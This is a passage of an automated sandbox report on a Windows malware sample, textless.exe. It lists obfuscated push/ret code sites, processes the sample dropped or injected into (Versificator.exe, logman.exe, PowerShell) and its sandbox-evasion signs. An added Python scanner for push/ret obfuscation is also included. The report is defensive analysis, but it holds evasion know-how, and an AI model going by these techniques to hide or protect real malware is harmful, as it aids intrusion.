            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048D4740 push edx; retf 14_2_048D4741
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048C58FF push CC412C59h; retf 14_2_048C5908
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048C20F2 push ss; ret 14_2_048C2102
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048D5A93 push ecx; iretd 14_2_048D5A48
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048C32E8 pushfd ; ret 14_2_048C32E9
            Source: C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\0ogHncCUa.exe | Code function: 14_2_048C8B87 push 00000028h; ret 14_2_048C8B89
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030A225F pushad ; ret 15_2_030A27F9
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030A27FA pushad ; ret 15_2_030A27F9
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030D09AD push ecx; mov dword ptr [esp], ecx 15_2_030D09B6
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030A283D push eax; iretd 15_2_030A2858
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030A1366 push eax; iretd 15_2_030A1369
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_030A9939 push es; iretd 15_2_030A9940
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274F32E push ebx; ret 15_2_0274F336
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_02743034 pushfd ; ret 15_2_02743035
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274564B push CC412C59h; retf 15_2_02745654
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_027557DF push ecx; iretd 15_2_02755794
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0275448C push edx; retf 15_2_0275448D
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0275BAE1 push cs; iretd 15_2_0275BAE5
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_027488D3 push 00000028h; ret 15_2_027488D5
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_02741E3E push ss; ret 15_2_02741E4E
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_0274EC29 push edx; retf 15_2_0274EC2B
            Source: C:\Windows\SysWOW64\logman.exe | Code function: 15_2_02751C85 push ecx; iretd 15_2_02751C86
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Versificator.exe
            Source: C:\Users\user\Desktop\textless.exe | File created: C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll
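The push/ret pairs listed in this section are the indicator behind the Data Obfuscation classification: a push of a register, segment register, flags or immediate followed by ret, retf or iretd is an indirect jump through the stack that a recursive-descent disassembler cannot follow, and the report also lists push reg; mov dword ptr [esp], reg pairs, which change the value in that stack slot immediately after pushing it. The following is an added example, not the sandbox's own detection logic: a Python byte-pattern scanner for exactly those opcode sequences in 32-bit (SysWOW64) code, run over a constructed, hand-assembled sample. The sample bytes and the base address are my own and are not taken from the malware's memory dumps.

```python
# Linear-sweep scanner for push/ret style control-flow obfuscation in 32-bit code.
# Added example; the sandbox's own signature logic is not public and is not reproduced here.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
PUSH_ONE_BYTE = {0x50 + r: f"push {name}" for r, name in enumerate(REGS)}   # push r32
PUSH_ONE_BYTE.update({0x06: "push es", 0x0E: "push cs", 0x16: "push ss",
                      0x1E: "push ds", 0x60: "pushad", 0x9C: "pushfd"})
RETS = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def find_push_ret(code, base=0):
    """Return (address, text) for every push immediately followed by a return
    (ret/retf/iretd) or by mov dword ptr [esp], <same register>.

    Every byte offset is tried as an instruction start, because obfuscated
    code is deliberately not instruction-aligned; see the caveat below.
    """
    hits = []
    n = len(code)
    for i in range(n):
        b = code[i]
        reg = None
        if b in PUSH_ONE_BYTE:
            mnem, size = PUSH_ONE_BYTE[b], 1
            if 0x50 <= b <= 0x57:
                reg = b - 0x50
        elif b == 0x68 and i + 5 <= n:                      # push imm32
            imm = int.from_bytes(code[i + 1:i + 5], "little")
            mnem, size = f"push {imm:08X}h", 5
        elif b == 0x6A and i + 2 <= n:                      # push imm8 (sign-extended)
            imm = code[i + 1]
            if imm & 0x80:
                imm |= 0xFFFFFF00
            mnem, size = f"push {imm:08X}h", 2
        else:
            continue
        j = i + size
        if j < n and code[j] in RETS:
            hits.append((base + i, f"{mnem}; {RETS[code[j]]}"))
        elif (reg is not None and j + 2 < n and code[j] == 0x89          # mov r/m32, r32
              and code[j + 1] == (0x04 | (reg << 3)) and code[j + 2] == 0x24):  # [esp]
            hits.append((base + i, f"{mnem}; mov dword ptr [esp], {REGS[reg]}"))
    return hits


# Constructed sample: hand-assembled bytes, not taken from the analysed binaries.
SAMPLE = bytes.fromhex(
    "9090"          # nop; nop (filler)
    "681519081cc3"  # push 1C081915h; ret
    "8b4508"        # mov eax, [ebp+8] (ordinary code, must not match)
    "51890c24"      # push ecx; mov dword ptr [esp], ecx
    "6a28c3"        # push 28h; ret (printed as 00000028h, as in the report)
    "9cc3"          # pushfd; ret
    "52cb"          # push edx; retf
    "16c3"          # push ss; ret
    "51cf"          # push ecx; iretd
)

if __name__ == "__main__":
    for addr, text in find_push_ret(SAMPLE, base=0x1000):
        print(f"{addr:08X}  {text}")
```

Caveat for use on real dumps: a linear sweep over unaligned bytes will also match inside data, relocations and the middle of longer instructions, and a single push eax; ret can occur in ordinary code. Treat the count per function or per page as the signal, as the report does by listing many hits per process, and confirm individual hits with a disassembler before citing them.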

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\textless.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\textless.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\textless.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; API/Special instruction interceptor: Address: 2B05AD1
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; Code function: 11_2_2127096E rdtsc
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7233
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2322
            Source: C:\Users\user\Desktop\textless.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nss21DC.tmp\nsExec.dll
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exe; API coverage: 0.3 %
            Source: C:\Windows\SysWOW64\logman.exe; API coverage: 2.2 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6004; Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 2372; Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
            Source: C:\Windows\SysWOW64\logman.exe; Last function: Thread delayed
            Source: C:\Users\user\Desktop\textless.exe; Code function: 0_2_00406167 FindFirstFileA,FindClose
            Source: C:\Users\user\Desktop\textless.exe; Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
            Source: C:\Users\user\Desktop\textless.exe; Code function: 0_2_00402688 FindFirstFileA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\textless.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
            Source: C:\Users\user\Desktop\textless.exe; File opened: C:\Users\user
            Source: C:\Users\user\Desktop\textless.exe; File opened: C:\Users\user\AppData\Local\Microsoft
            Source: C:\Users\user\Desktop\textless.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Windows
            Source: C:\Users\user\Desktop\textless.exe; File opened: C:\Users\user\AppData\Local
            Source: C:\Users\user\Desktop\textless.exe; File opened: C:\Users\user\AppData
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: svchost.exe, 00000004.00000002.2119549686.000002551FA2B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWy
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Add-NetEventVmNetworkAdapter@\
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Remove-NetEventVmNetworkAdapter@\
            Source: powershell.exe, 00000001.00000002.1495736567.0000000005398000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Get-NetEventVmNetworkAdapter@\
